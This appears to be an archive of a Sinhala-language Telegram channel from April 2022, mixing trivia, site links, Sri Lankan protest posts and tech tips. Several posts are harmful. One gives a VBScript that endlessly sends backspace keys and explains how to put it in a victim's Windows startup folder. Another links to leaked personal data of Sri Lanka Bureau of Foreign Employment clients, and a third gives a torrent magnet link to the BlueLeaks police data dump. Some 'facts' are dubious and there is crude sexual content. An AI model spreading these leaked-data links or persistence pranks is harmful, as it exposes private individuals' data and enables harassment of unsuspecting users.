• 02 April 2022 (2 messages)
  • @STUFFuckthesystem #1812 11:18 AM, 02 Apr 2022
    එක එක Drugs දුන්නම මකුලුවො දැල් බදින විදිහ වෙනස් වෙන විදිහ බලන්න NASA එකෙන් 1995 දි කරපු Experiment එකක් 😙❤️

    @SusaEpic
    #spiders #drugs #ganjaspidy
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1813 03:26 PM, 02 Apr 2022
    අරගල කරලා උත්තරයක් හම්බෙයිද? 🙂
  • 03 April 2022 (6 messages)
  • @STUFFuckthesystem #1814 12:37 AM, 03 Apr 2022
    හායි මගෙ රත්තරන් යාලුවනේ කොහොමද 😙❤️

    Social media block කරල තියන එකේ vpn නොදා telegram එකට එන්න telegram proxy වලින් පුලුවන්

    https://t.me/proxy?server=proxy.mtproto.co&port=443&secret=11112222333344445555666677778888

    For More -
    @mineproxy
    @ProxyMTProto
    @TelMTProto

    Slow වෙලා වගේ නම් මේවෙන් වෙන එකක් ගන්න 🙃

    ඔය උඩ ලින්ක් එක click කරල connect දෙන්න යාම්ලුවනේ 🙂
  • @STUFFuckthesystem #1816 04:32 AM, 03 Apr 2022
    Anonymous ලගෙන් උදව් ඉල්ලන අයට 😙❤️

    anon ලගෙ මුලදි හිටිය "පොරවල්" දැන් නෑ, DDoS පරක් ගහල ඩේට ලීක් එකක් කරන්න පුලුවන් industry expertsල වැඩිය ගනන් ගන්නෙ නැති සෙට් එකක් ඉන්නෙ, උන් මොනා කරන්නද?

    පැනමා,පැන්ඩෝරා පේපස් තිබිල නෙමේ සක්කරය ඇවිත් මෙච්චර ගත්ත කිව්වත් අහන්නෙ නැති උන් ඉන්න එකේ මුන් මොනා කරන්නද data leak එකකින්?

    වැඩිම උනොත් ෆෝන් එකට පොඩි ඇප් එකක් ඉන්ස්ටෝල් කරෝල ( ඒකත් අපේ උන් මෝඩ නිසා ක්ලික් කරෝල ) මොන හරි වයිෆ්ට චීටින් සීන් එකක් ලීක් කරයි, ඒකෙන් රටට මක් වෙන්නද?

    ෆ්ල්යොයිඩ්ගෙ කෙස් එකේදි පොලිසියෙ අය තේ බොන තැනත් දන්නව කිව්ව අන්තිමට සයිට් ටිකක් හැක් කරල, කලින් ලීක් වෙච්ච ඊමේල් ටිකක් උන් කලා වගේ එලියට දාල හිටිය එච්චරයි.

    හරි, මොකුත් ඕනි නෑ, ඊ_ස්ටර් ඇටෑක් කාලෙත් මුන් කිව්ව අපි හොයල දෙන්නම් ගගා..හොයල දුන්න pම්කක්.

    හැබැයි ග්ලෝබල් ඇටෙන්ශන් එක ටිකක් හරි වැඩියෙන් මේකෙන් හම්බෙනවා ( ඊ_ස්ටර් කාලෙ උන් දාපු පෝස්ට් වලින් ආපු රීච් එකෙන් උන මහලොකු දේකුත් නෑ හැබයි ) , කමක් නෑ, රීච් ඒක හරි මදැයි.
    අහ්, අනිත් පැත්තෙන් හැබැයි මෙව්ව දැකල ටුවරිස්ම් වලට කෙල උනාම ආපු ඩොලර් ජුන්ඩත් නෑ.

    පැය ගානක් එඩිට් කර කර මේ හෑල්ල ලිව්වෙ anonල ඇවිත් අපිව බේරගනී කියල හිතා ඉන්න අයට.

    කට්ටඩි එකමුතුව >>> Anonymous

    fyi, කෙලවන්න ඕනි නම් කේම්බ්‍රිජ් ඇනලටිකා ටයිප් එකටයි ගහන්න ඕනි, කන්සල්ටේශන් ඕනි නම් දවසට කෝටියයි හොඳේ 🙃 (jk/mbn)
    #AnonymousSaveSriLanka

    ටටා


    -------------------------------------------------------

    p.s. - මේ පෝස්ට් එකට බයිනකම් ඕක විතරද දැක්කෙ කියල, දවස් ගානකට කලින් මන් දැම්මා මේ තත්වෙට මූන දෙන්නෙ කොහොමද, අපිම ඩොලර් ටිකක් හොයාගන්නෙ කොහොමද කියල දවස් ගානකට කලින්, තාම චාර්ට් වල #1 පොඩ්කාස්ට් එක.
    https://anchor.fm/dilshanabey/episodes/Dilshans-Thoughts-S03-EP12-e1gfsf4

    By Dilshanabey
    Dilshan's Thoughts S03 EP11 by Dilshan's Thoughts

    How can we face this situation in Sri Lanka, how can we earn USD

  • @STUFFuckthesystem #1817 04:59 AM, 03 Apr 2022
    VPN use කරනවනම් හැමවෙලේම එකම රටේ එකම location එක දාගෙන use කරන්න. Location මාරු කර කර social media accounts use කරොත් account lock වෙන්න පුලුවන් 🙂❤️

    @SusaEpic
    #gonnapota
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1818 06:25 AM, 03 Apr 2022
    A Twitter war has begun 😂❤️
  • @STUFFuckthesystem #1819 09:12 AM, 03 Apr 2022
    Imagine, Starlink Free access හම්බෙනවා 🙂❤️
  • @STUFFuckthesystem #1820 09:55 PM, 03 Apr 2022
    Mouse pointer එක අමුතුම විදිහකට locate කරන site එකක් 🙂❤️

    wow :0

    ▫️▫️▫️▫️▫️▫️▫️▫️
    pointerpointer.com
    ▫️▫️▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #pointer #AI #locate
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 04 April 2022 (3 messages)
  • @STUFFuckthesystem #1821 08:33 AM, 04 Apr 2022
    ජාතික රූපවාහිනිය left 🙂💔

    #gonnapota
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1823 10:25 PM, 04 Apr 2022
    AI වලින් Generate කරපු පූසෝ 😗❤️

    ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️
    thesecatsdonotexist.com
    ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #pusa #pussy #ai
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 05 April 2022 (2 messages)
  • @STUFFuckthesystem #1824 12:07 AM, 05 Apr 2022
    Twitter එකේ කොටස් වලින් 9.2% ක් දැන් Elon ගෙ (73.4 million shares) 🙂❤️

    #elicaron
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1825 05:04 AM, 05 Apr 2022
    බලලා Delete කරන්න කියන ඒවා, ඇත්තටම බලලා Delete කරනවාද? 🙃
  • 06 April 2022 (1 messages)
  • @STUFFuckthesystem #1826 10:11 PM, 06 Apr 2022
  • 07 April 2022 (1 messages)
  • @STUFFuckthesystem #1827 10:50 AM, 07 Apr 2022
    Sanika enna vatalanna 🙂💔

    #bitcoin #gonnapota #bitkasi
  • 08 April 2022 (1 messages)
  • @STUFFuckthesystem #1828 02:45 PM, 08 Apr 2022
    The World's Largest Outdoor Nude Beauty Pageant 😙❤️

    Nudes-A-Poppin කියන්නේ ඇමෙරිකාවේ ඉන්දියානා වල වාර්ෂිකව තියන Public සෙක්ස් සංදර්ශනයක්. මේකෙදි ගැහැනු, පිරිමි හැමෝම ඇදුම් නැතුව තමයි ඉන්නේ ගොඩක් දුර‍ට. Wet T-shirt contest, Sexiest Pole Dance, Naked Wrestling වගේ ගොඩක් තරග තියෙනවා. ඇමෙරිකාවේ ගිය දවසක බලම්න යම්න 🙂❤️

    ShAreD by : @Cygnus_Black
    #niruvath #heluPageant #chik #eeya
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 10 April 2022 (1 messages)
  • @STUFFuckthesystem #1830 01:58 PM, 10 Apr 2022
  • 11 April 2022 (5 messages)
  • @STUFFuckthesystem #1831 12:26 AM, 11 Apr 2022
    Password වලට ලුණු දාමු 😙❤️ (Salting)

    ඔයාලා සමහරවිට දන්නව ඇති අපි මොකක් හරි account එකකට password එකක් දාද්දි ඒක එයාලගෙ database වල save වෙන්නෙ hash එකක් විදිහට කියල..උදාහරණයක් ගත්තොත්..

    Password : Gonnapota

    Hash (MD5) : 903d8a108d13f7ed6f93df017869766e

    එතකොට hackers ලට database වලට රිංගලා අපේ login details ගන්න අමාරුවෙනවා..ඒත් බැරිවෙන්නෙ නැ 🙃 මොකද dictionary attacks වගේ ක්‍රමවලින් තවමත් මෙයාලට අපේ passwords උස්සන්න පුලුවන්..

    මේ අවදානම අඩුකරගන්න තමා අපි password එකට ලුණු දාන්නෙ..නැත්තන් salting 😙❤️

    ඔයා එකම password එක accounts ගොඩකට use කරනවනම් ඇත්තටම ඒක ගොන් වැඩක් ඒත් salting හින්දා ඔයාට තියන risk එක අඩුවෙනවා.. 🙂

    Salting වලදි ඔයා site එකට password එක දෙද්දි එයාලා ඒක save කරන්න කලින් ඔයාගෙ password එක ඉස්සරහට හරි අගට හරි ලුණු දාලා තමා save කරන්නෙ.. 😅 මෙතෙන්දි මම ලුණු කියල අදහස් කරෙ salt value එක..උදාහරණෙකින්ම බලමු 😙

    Password - Gonnapota

    Salt Value - GoHome

    Salted Password - GoHomeGonnapota or GonnapotaGoHome

    Hash (MD5) - 5d8ff1f8c12c59f5295254fc607948cb

    මෙතෙන තියන hash එකයි අපි පලවෙනිම උදාහරණෙදි දැක්ක hash එකයි සම්පූර්ණෙන්ම වෙනස් කියල ඔයාලට පේනව ඇති 😙❤️ ඒක වුනේ අපි මේකට GoHome කියන salt value එක add කරපු නිසා..

    එතකොට ඔයා account ගොඩකට එකම password දාලා තිබ්බත් ඔක්කොටම කෙලවෙන්න තියන risk එක අඩුවෙනවා..මොකද hacker කෙනෙක් ඔයාගෙ එක account එකක password එකේ hash එක හොයාගත්තත් අනිත් account වල password වල hash එක්ක ඒක ගැලපෙන්නෙ නැ because the salt value has been added 😙

    Site වල මේ විදිහට use කරන salt value එක public කරන්නෙ නැ..සමහර site එකම salt value එක use කරද්දි සමහරු random salts use කරනවා..එතකොට තවත් secure වෙනවා 🙂❤️

    මම use කරපු GoHome වගේ ගොබ්බ salt values, site වල use කරන්නෙ නැ...ඒකත් Symbols, Numbers, Text තියන strong salt value එකක් වෙන්නොන 😙

    මම හිතනවා ඔයාලට salting ගැන අදහක් එන්න ඇති කියල...ඒ වගේම මෙතන ඔයාලා දන්න දේවල් සහ අඩුපාඩු තියනවනම් පල්ලෙහයින් කියාගෙන යමු..අරගලයට ජය ❤️

    Article by @SusaEpic

    #saltingWithGonnapota #lunu #security #hash
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1832 05:29 AM, 11 Apr 2022
    ඔබේ ඉඩම අදම වෙන්කරවා ගන්න 😙❤️

    Gotagogama - ගෝඨාගෝගම

    https://maps.app.goo.gl/h9ioQXZpeRH4CKAL7

    Gota go village

    https://maps.app.goo.gl/YkD2iw7FdrLaWLbU9

    GotaGo ගම

    https://maps.app.goo.gl/aBnD8VcfmNNZEmA3A

    Rajapaksha go gama

    https://maps.app.goo.gl/Zwv1Etca7WEjWqWW6

    Copied from Chanuka Nadun
    #rajapacca #villages #ThecalaWiduliya
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1833 06:36 AM, 11 Apr 2022
    Hiran Abeysekera, Olivier awards වල හොදම නලුවාට හිමි සම්මානය ගන්නවා 🙂❤️

    ඒ Life of Pi වේදිකා නාට්‍යයෙ දක්වපු රංගනයට... ලංකාව මතක් කරන්නත් අමතක කරන්නෙ නැ 🇱🇰 😙❤️

    Congratzzz himran ❤️

    @SusaEpic
    #Olivier #proud #hiran #GoHomeGota #gohomerajapaksas #srilanka
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1834 12:50 PM, 11 Apr 2022
    Site එක්කුත් හදල 😙❤️

    ▫️️▫️️▫️️▫️️▫️️▫️️▫️️▫️️▫️️
    gohomegota.online
    ▫️️▫️️▫️️▫️️▫️️▫️️▫️️▫️️▫️

    #gonnapota #gohome #site #onecountryonenation
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1835 01:00 PM, 11 Apr 2022
    මේ වෙලාවෙදි ඔයත් රජ පවුලෙ රාජපක්ෂ කෙනෙක්නම් මොකද කරම්නෙ? 🙃
  • 13 April 2022 (3 messages)
  • @STUFFuckthesystem #1836 07:16 AM, 13 Apr 2022
    SLTMOBITEL offers 😙❤️
  • @STUFFuckthesystem #1837 07:16 AM, 13 Apr 2022
  • @STUFFuckthesystem #1838 08:09 AM, 13 Apr 2022
    Offers හම්බෙන්නෙ :

    ▫️ SLT-Mobitel Fibre
    ▫️ SLT-Mobitel ADSL
    ▫️ SLT-Mobitel Home 4GLTE

    (All SLT-MOBITEL home broadband customers)

    #enjoy
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 14 April 2022 (6 messages)
  • @STUFFuckthesystem #1839 01:03 AM, 14 Apr 2022
    ලෝකෙ තියන Random places වලට යන්න 😗❤️

    ▫️▫️▫️▫️▫️▫️▫️▫️
    mapcrunch.com
    ▫️▫️▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #nakimaina #random #googlemaps #gotapl
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1840 01:48 AM, 14 Apr 2022
    Military language එකෙන් ඔයාගෙ නම කියාගෙන යමු 😗❤️

    mine : Sierra Uniform Sierra Alpha

    @SusaEpic
    #military #lang #gohomegota
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1841 02:43 AM, 14 Apr 2022
    ඥානක්කා ගෙ "ඥා" යන්න ගහගන්න දම්නෙ නැද්ද? 🙃❤️

    ▫️️▫️️▫️️▫️️▫️️▫️️
    type z + h
    ▫️️▫️️▫️️▫️️▫️️▫️️

    ShAred By : @himax_lk
    #gotapl #zhanakka
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1842 03:27 AM, 14 Apr 2022
  • @STUFFuckthesystem #1843 03:40 AM, 14 Apr 2022
    ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⢀⠀⠘⢑⠡⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⠀⠀⢲⣶⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⠐⢠⣿⣿⣿⣿⣷⣀⠀⠀⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣧⠀⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⢰⣿⣿⣿⣿⣿⣿⣿⣷⣶⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⡀⠀⠀⠀
    ⠀⠀⠀⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡆⠀⠀⠀
    ⠀⠀⠀⠀⢀⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡧⠀⠀⠀
    ⠀⠀⠀⠀⠀⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠇⠀⠀⠀
    ⠀⠀⠀⠀⠀⠘⣿⣿⣿⣿⣿⣿⣿⣿⠿⠋⠀⠀⠀⠀
    ⠀⠀⠀⠀⠀⠀⠙⠿⣿⣿⠿⠛⠋⠁⠀⠀⠀⠀⠀⠀
    ⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
    HaPpY NeW yeAr MotHeR FuCkerS 🇱🇰 ❤️

    @SusaEpic
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1844 11:54 AM, 14 Apr 2022
    These tickets are to be sold or exchanged in to a ticket for a show on saturday or sunday.
    Urgent
  • 17 April 2022 (2 messages)
  • @STUFFuckthesystem #1845 02:18 AM, 17 Apr 2022
    Akiyoshi's illusion pages 😗❤️

    illusions ගැනම තියන page එකක්

    ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️
    ritsumei.ac.jp/~akitaoka/index-e.html
    ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #illusions #akiyoshi #optical #visual
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1846 02:36 AM, 17 Apr 2022
    ලෝකෙ තියන කැතම site එක 🙃❤️

    ▫️▫️▫️▫️▫️▫️▫️▫️▫️
    theworldsworstwebsiteever.com
    ▫️▫️▫️▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #worst #site #world #Gohomegota
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 18 April 2022 (4 messages)
  • @STUFFuckthesystem #1847 01:15 PM, 18 Apr 2022
    FACT 🙂

    Twitter logo එකේ ඉන්න කුරුල්ලගෙ නම Larry 😙❤

    @SusaEpic
    #bird #twitter #logo #larry #gohomegota
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1848 01:19 PM, 18 Apr 2022
    ටිකක් පරණ Offer එකක් try කරල බලන්න..සමහරුන්ට හම්බෙයි 😙❤️

    http://sm.dialog.lk/data/offer?utm_source=facebook&utm_medium=inhouse&utm_campaign=mbb--n_a--fcmngmnt--l_c--n_a--facebook--n_a&utm_content=n_a&utm_term=n_a&fbclid=IwAR11Vlzd0vLb29YDhpRh5peSfLbTlOQZ_MBjxSUycgf-hmg-8TgcE9abt_Y

    sHarEd bY : https://t.me/mr_demonlk
    #dialog #Freedata #offers
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
    The den of tech by Mr.Demonlk

    Technology ගැන interest ඕනෙම කෙනෙකුට.

  • @STUFFuckthesystem #1849 11:22 PM, 18 Apr 2022
  • @STUFFuckthesystem #1850 11:22 PM, 18 Apr 2022
    ඇත්ත පෙනුම 😙❤️

    ඔයා වගේම මමත් හැමදාම මූණ බලන්නෙ කන්නාඩියෙන්... අපි හැමෝම දන්නවා කන්නාඩියෙන් අපි දකින්නෙ අපිව flip වෙලා නැත්තන් අනිත් පැත්ත හැරිලා කියලා.. අනිත් පැත්ත හැරුණ ප්‍රතිබිම්බයක් බලාගෙන තමයි අපි හැඩවෙන්නෙ.. 🙃

    හැබැයි phone එකක rear camera එකෙන් නැත්තන් පස්සහ තියන cam එකෙන් photo එකක් ගහපුහම ඒකෙ අපේ පෙනුම වෙනස්..🙃 ගොඩක් දුරට කැතයි කියල තමයි හිතෙන්නෙ..හැබැයි ඒ තමා අපෙ ඇත්‍ත පෙනුම..photo එකක් ගහද්දි අපිට photo එක ඇතුලෙ තියන අකුරු flip වෙන්නෙ නැතුව හරියටම පේනවනම් ඒ photo එකේ අපිව පේන්නෙත් ඇත්ත පෙනුමෙන්. 🙂💔

    ගොඩක් අය rear camera එකට වඩා selfie ගහන්න ආස කරන්නෙ selfie cam එක වැඩ කරන්නෙත් කණ්ණාඩියක් විදිහට හින්දා. 🙂❤️ ඒකට අකුරු අල්ලලා බැලුවොත් පේන්නෙ අනිත් පැත්ත හැරිලා කියලා ඔයාලට note වෙලා ඇති.

    කණ්ණාඩියෙන් සෑහෙන කාලයක් අපිව දැකලා දැකලා ඒ අපේ ඇත්තම පෙනුම කියල අපි තදින් විශ්වාස කරනවා..🙃 මොකද එතකොට අපේ මූණ පේන්නෙ ගොඩක් දුරට සමමිතිකව..හැබැයි උඩ කිව්ව විදිහට ඔයාගෙ ඇත්ත මූණ දකිද්දි ඒකෙ සමමිතික ගතිය අඩුවෙලා පේන්න පුලුවන්..මොකද හරියටම සමමිතික මූණු තියෙන්නෙ අඩු ප්‍රතිශතේකට..🙁 හැබැයි mirrored පෙනුමට වඩා real පෙනුම ලස්සන අයත් මේ අතර ඉන්නවා.. 😙

    ඔයාලට selfie camera එකෙන් ඇත්ත පෙනුම බලාගන්න ඕනනම් tiktok එකේ තියන inverted filter එක දාගන්න..(උඩ image එක) 😙 කන්නාඩියකින් මූණ බලනවට වඩා ඒ filter එක දාගෙන මූණ බලන එක ඵලදායි වෙයි... කන්නාඩි දෙකක් අංශක 90 කෝණයකින් තියල බලද්දිත් ඔයාට ඇත්ත පෙනුම බලාගන්න පුලුවන් 😙❤️

    මේ ගැන ඔයා දන්න දේවලුත් කියාගෙන යමු...මූණ බලද්දි ඇත්ත පෙනුම බලලා වැඩ කෑලි ටික දාන්න අමතක කරන්නෙපා 😙❤️

    @SusaEpic
    #face #real #dekamaCathai #rear #selfie #photogenic
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 19 April 2022 (1 messages)
  • @STUFFuckthesystem #1851 05:25 AM, 19 Apr 2022
  • 20 April 2022 (5 messages)
  • @STUFFuckthesystem #1852 08:37 AM, 20 Apr 2022
    😙❤️
  • @STUFFuckthesystem #1853 08:47 AM, 20 Apr 2022
    🙃 Tipper wennapa ek hind
  • @STUFFuckthesystem #1854 11:45 AM, 20 Apr 2022
    ආසම Celebrity කවුද? 😙
  • @STUFFuckthesystem #1855 02:18 PM, 20 Apr 2022
    Leak වුණ Data 😗❤️

    SRI LANKA BUREAU OF FOREIGN EMPLOYMENT

    ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️
    mega.nz/folder/xI1XSKab#-2uhPtt9HTrhDJ-NSAmp7A
    ▫️▫️▫️▫️▫️▫️▫️▫️▫️▫️

    මෙතන තියෙන්නෙ අපේ මිනිස්සුන්ගෙම Data හැබැයි.. 🙃

    #anonymous #sl #gohomegota #lulzsecsl #leak
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
    Link

    MEGA provides free cloud storage with convenient and powerful always-on privacy. Claim your free 20GB now

  • @STUFFuckthesystem #1856 10:05 PM, 20 Apr 2022
    The Batman බැලුවනම් දන්නව rataalada.com කියන riddler ගෙ site එක ගැන. අපිටත් ඒකට ගිහිල්ලා riddles වලට උත්තර දෙන්න පුලුවන් කම තිබ්බා 😙

    හැබැයි දැන් ඒක Gotham police යටතට අරන් තියනවා..මොකද දැන් riddler ඉන්නෙ හිරෙ..ඒත් එක්කම site එක down 🙃❤️ ගිහින් බලම්න

    @SusaEpic
    #thebatman #rataalada #riddler #DC #gotham
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 21 April 2022 (3 messages)
  • @STUFFuckthesystem #1857 08:09 AM, 21 Apr 2022
    යාලුවගෙ pc එක දිගටම back කරමු 😗❤️

    ▫️ Notepad එක open කරගන්න

    ▫️ මේ code එක paste කරන්න

    Set wshShell=wscript.CreateObject("WScript.Shell")

    do
    wscript.sleep 100
    wshshell.sendkeys "{bs}"
    loop

    ▫️ ඔයාට කැමති නමක් දාලා නමේ අන්තිමේට .bat දාලා save කරන්න

    ▫️ file එක open කරපු ගමන් ඔක්කොම back වෙන්න ගයි..type කරන්නත් බෑ clear වෙනවා 🙃😗

    ▫️ යාලුවෙක්ට යවලා ඌ බයවෙන විදිහ බලලා සතුටුවෙන්න

    ▫️ නවත්තගන්න ඕනනම් task manager open කරලා (Ctrl + alt + dlt) උඩ image එකේ තියන programme එක end කරන්න 🙂

    මම @SusaEpic
    #prohakarDn #notepad #vbs #amneMnDnMk
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • Let's scare more....

    Press Windows Key + R

    Type shell:startup

    copy the .bat file to the opened folder

    Now Victim can enjoy it each and every time he turn on the PC 😙❤️
  • @STUFFuckthesystem #1859 10:53 PM, 21 Apr 2022
    BLUE LEAKS 😵‍💫

    2020 ජූනි 19 වෙනිදා කවුරුත් කතාවෙන Anonymous ලා ඇමරිකාවෙ නීතිය ක්‍රියාත්මක කරන ආයතන විශේෂෙන්ම පොලිසිවල ලොකු Data leak එකක් කරනවා. දැනට US වල ආරක්ෂක අංශ සම්බන්ධව වුණ ලොකුම leak එක කිව්වොත් හරි. මේකට Blue leaks කියන්නෙත් පොලිසිය සම්බන්ධ නිසා..🙂❤️

    මෙතන 269GB ක police data තියනවා. ඒ අතර emails, audio, video, intelligence documents විදිහට files මිලියන ගාණක් තියනවා. 🙃 මේ leak එක පට්ට භයානක වෙන්න හේතුව තමයි මේ data අතර bank account routing numbers , අපරාධකරුවොන්ගෙ photos, සැකකරුවො ගැන විස්තර, private business ගැන, health care වගේ highly sensitive data තියන එක 😐

    ඔයාලටත් ඉත්තෑවෙක් ඉන්නවනම් download කරලා බලන්න 😗❤️

    magnet:?xt=urn:btih:8cf92b7cd3f022fa5478b84963e89c1dd0af090f&dn=BlueLeaks&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969%2Fannounce&tr=udp%3A%2F%2F9.rarbg.to%3A2920%2Fannounce&tr=udp%3A%2F%2Ftracker.opentrackr.org%3A1337&tr=udp%3A%2F%2Ftracker.leechers-paradise.org%3A6969%2Fannounce&tr=udp%3A%2F%2Ftracker.coppersurfer.tk%3A6969%2Fannounce

    මම @SusaEpic
    #anonymous
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 22 April 2022 (1 messages)
  • @STUFFuckthesystem #1860 03:55 AM, 22 Apr 2022
    Use කරන්නෙ නැති Twitter Accounts තියනවනම් පුලුවන් අය දෙම්න😙❤️

    @SusaEpic
  • 23 April 2022 (2 messages)
  • @STUFFuckthesystem #1861 10:11 AM, 23 Apr 2022
    හෙළකුරු keyboard එක දාගෙන කිසිම Credit card info එකක් type කරන්න එපා 🙃❤️

    මෙහෙම කියන්න හේතුව තමා හෙළකුරු වගෙ third party apps වලට අපි keyboard එකේ type කරන හැමදේටම ( Sensitive data වලට පවා) Access තියන එක 🙃 හැබැයි හෙළකුරු වගේ ලංකාවෙ තියන හොද service එකක් දෙන සෙට් එකක් එහෙම කරන්නෙ නැතිවෙයි කියල ගොඩක් විශ්වාසයි. ❤️

    ඒත් ඔයාලා වෙන වෙන third party keyboards use කරනවනම් පරිස්සම්වෙන්න 😙❤️

    @SusaEpic
    #helakuru #info #keyboard #thirdparty
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1862 11:44 AM, 23 Apr 2022
    STUFF එක ගැන අදහස් දාගෙන යමු 😙❤️
  • 24 April 2022 (1 messages)
  • @STUFFuckthesystem #1863 02:43 PM, 24 Apr 2022
    ඔයාගෙ පාතාලේ නම කියාගෙන යමු 😗❤️
  • 25 April 2022 (3 messages)
  • @STUFFuckthesystem #1864 12:59 AM, 25 Apr 2022
    පෙම්වතෙක් පෙම්වතියක් නැති ඔබට...

    A M A Z O N D A T I N G 😗❤️

    කැමති කෙනාව purchase කරන්න 🙃

    ▫️▫️▫️▫️▫️▫️▫️▫️
    amazondating.co
    ▫️▫️▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #date #amazon #purchase #gotagohome
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1865 06:33 AM, 25 Apr 2022
    FACT 🙂

    පවුලක ඉන්න අනිත් ළමයින්ට වඩා මුලින්ම ඉපදුන පොරගෙ IQ එක වැඩියි කියල Research එකකින් හොයාගෙන තියනවා 😙❤️

    @SusaEpic
    #locuputha #locuduwa #iq #smart
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1866 10:32 AM, 25 Apr 2022
    හිතන එක නවත්තන්න පුලුවන්ද ? 🤔
  • 26 April 2022 (2 messages)
  • @STUFFuckthesystem #1867 04:38 AM, 26 Apr 2022
    දැන් Larry, Elon ගෙ 😙❤️

    Elon Musk buys Twitterrrr

    @SusaEpic
    #twitter #elon #larry #gohomegota
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1868 02:47 PM, 26 Apr 2022
    FACT 🙂

    US වල ප්‍රාන්ත හතරක් වෙන Wyoming, Hawaii, New Mexico, and West Virginia වල සත්තු සමග සංසර්ගය නැත්තන් Bestiality නීතිගතයි.. 🙃❤️

    SHarEd By : @peace_of_a_shit
    #sexualintercourse #animalsecs #eeya #us
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • 28 April 2022 (3 messages)
  • @STUFFuckthesystem #1869 01:03 AM, 28 Apr 2022
    Google ගෙ thug lipe එක 😗❤️

    ▫️▫️▫️▫️▫️▫️
    gizoogle.net
    ▫️▫️▫️▫️▫️▫️

    @SusaEpic
    #thug #google #gohomegota #yobitch
    STUFFᴾʳᵒʲᵉᶜᵗ ᵇʸ ᴱˣᵛᵒᶦʸ
  • @STUFFuckthesystem #1870 09:14 AM, 28 Apr 2022
  • @STUFFuckthesystem #1871 01:55 PM, 28 Apr 2022
    Free Cloud Storage 500GB

    Cloud: Pcloud

    1️⃣ Steps:

